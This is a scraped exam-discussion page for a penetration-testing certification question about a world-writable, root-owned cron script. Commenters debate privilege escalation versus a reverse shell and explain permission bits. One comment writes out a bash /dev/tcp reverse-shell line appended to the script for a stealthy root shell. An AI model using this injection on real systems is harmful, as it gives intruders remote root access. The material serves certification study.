In order to use privilege escalation, you must start a reverse shell first. Your current shell has low permissions. So yes, you will now attempt to escalate privileges by running:
echo "bash -i >& /dev/tcp/attacker_ip/4444 0>&1" >> /scripts/daily_log_backup.sh
You can execute this file now (or wait until it runs automatically for extra stealth because it's likely a daily cron job) to spawn a root shell.
You now know where to go to escalate privilege but you run the risk of the server shutting down on you.
First thing you are taught once you get into a system is to create a back door. So I believe reverse shell is the right answer.
B. Use privilege escalation
I agree with the other contributors who selected B and their explanations.
These are spelled out in order from left to right: rwxrwxrwx
r User Permissions Read
w User Permissions Write
x User Permissions Execute
r Group Permissions Read
w Group Permissions Write
x Group Permissions Execute
r Other Permissions Read
w Other Permissions Write
x Other Permissions Execute
User Permissions: The user that owns the file.
Group Permissions: The group the file belongs to.
Other Permissions: The other users, i.e., everyone else.
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation.
In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.
The penetration tester can abuse this file configuration to do a lot of things involving privilege escalation, for sure one of then could be setting a reverse shell on the file (that would probrably be executed by a cronjob), but it could send commands to change files permissions, or change users permissions etc. So in my opinion, the bigger picture here is to escalete the privileges.
So you escalate privilege and is all happy - what happened if the server is shut down?
I think it's best to have a back door first before looking at escalation.. D is a better answer.
This file is NOT SUID executable. It can be used for a reverse shell
Ref:https://null-byte.wonderhowto.com/how-to/hacking-macos-perform-privilege-escalation-part-1-file-permissions-abuse-0186331/
The correct answer is reverse shell
To take advantage of the file /scripts/daily_log_backup.sh and use it to escalate privileges on the Linux system, the penetration tester can attempt to exploit a vulnerability in the script itself or in the interpreter that the script uses.
One way to exploit the script is to modify it by adding malicious code that will execute as root when the script runs. The tester can do this by first copying the script to a writeable directory using their non-privileged account. They can then modify the script by adding their own code that will give them a shell as root or allow them to escalate their privileges in another way.
This section is not available anymore. Please use the main Exam Page.PT0-002 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
kinny4000
2 months, 3 weeks agoSebatian20
5 months, 2 weeks agoPhillyCheese
9 months, 3 weeks agosolutionz
1 year, 2 months agoLeonidasss
1 year, 2 months ago864deb5
9 months agoRAMI_PAL
1 year, 5 months agomatheusfmartins
1 year, 2 months agoSebatian20
5 months, 2 weeks agoRAMI_PAL
1 year, 5 months agocy_analyst
1 year, 7 months ago[Removed]
1 year, 7 months ago